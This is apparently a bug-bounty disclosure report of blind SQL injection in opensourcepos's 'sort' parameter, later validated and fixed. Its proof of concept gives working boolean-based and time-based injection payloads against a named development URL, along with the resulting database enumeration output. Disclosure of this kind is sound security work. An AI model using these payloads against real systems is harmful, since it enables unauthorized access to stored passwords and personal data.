SQL Injection in opensourcepos/opensourcepos


Reported on

Aug 26th 2021

✍️ Description

The Application is vulnerable to blind SQL Injection

🕵️‍♂️ Proof of Concept

URL: https://dev.opensourcepos.org/attributes/search?sort=1 Vulnerable Parameter: sort


Parameter: sort (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: sort=(SELECT (CASE WHEN (5937=5937) THEN 1 ELSE (SELECT 4996 UNION SELECT 4231) END))

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: sort=1 AND (SELECT 3335 FROM (SELECT(SLEEP(5)))uafX)
available databases [2]:
[*] information_schema
[*] ospos

💥 Impact

SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands. A successful SQL injection attack can result in unauthorized access to sensitive data, such as (hashed) passwords, credit card details, or personal user information.



2 years ago


Hey Melbin, I've just emailed the repo maintainer about this report.

We have contacted a member of the opensourcepos team and are waiting to hear back 2 years ago
opensourcepos/opensourcepos maintainer validated this vulnerability 2 years ago
Melbin Mathew Antony has been awarded the disclosure bounty
The fix bounty is now up for grabs
jekkos marked this as fixed with commit b4c48e 2 years ago
jekkos has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation